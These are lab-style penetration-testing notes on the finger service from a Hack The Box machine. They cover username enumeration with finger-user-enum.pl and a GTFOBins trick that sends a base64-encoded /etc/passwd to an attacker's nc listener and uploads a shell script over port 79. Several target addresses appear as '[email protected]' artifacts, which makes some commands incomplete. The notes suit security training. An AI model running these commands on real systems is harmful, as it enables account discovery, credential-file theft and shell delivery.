- The finger daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.
- Credit: https://0xdf.gitlab.io/2018/09/29/htb-sunday.html
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
- Finger is an exceedingly old protcol very rarely in use today.
- Nmap results can show logged in users
| finger: Login Name TTY Idle When Where\x0D
| sunny sunny pts/1 Thu 14:52 10.10.14.245 \x0D
finger @10.10.10.76
No one logged on
finger [email protected]
jack ???
#above does not exist
finger [email protected]
Login Name TTY Idle When Where
root Super-User console <Oct 14 10:28>
#user that does exist and is logged in
finger [email protected]
Login Name TTY Idle When Where
ikeuser IKE Admin < . . . . >
#user that does exist but is not logged in
If finger returns no logged in users, we can try to brute force usernames. We’ll use the finger-user-enum.pl script from pentestmonkey.
root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Thu Sep 27 17:39:02 2018 #########
[email protected]: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
[email protected]: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne [email protected]: Login Name TTY Idle When Where..anne ???..marie ???..
[email protected]: bin ??? < . . . . >..
dee [email protected]: Login Name TTY Idle When Where..dee ???..dee ???..
jo [email protected]: Login Name TTY Idle When Where..jo ???..ann ???..
la [email protected]: Login Name TTY Idle When Where..la ???..verne ???..
[email protected]: Login Name TTY Idle When Where..lp Line Printer Admin
While working on this post, I was checking out gtfobins, and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:
root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]
root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768
root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...
You can upload files to a target machine as well:
root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79
root@sunday:~# finger [email protected] > shell.b64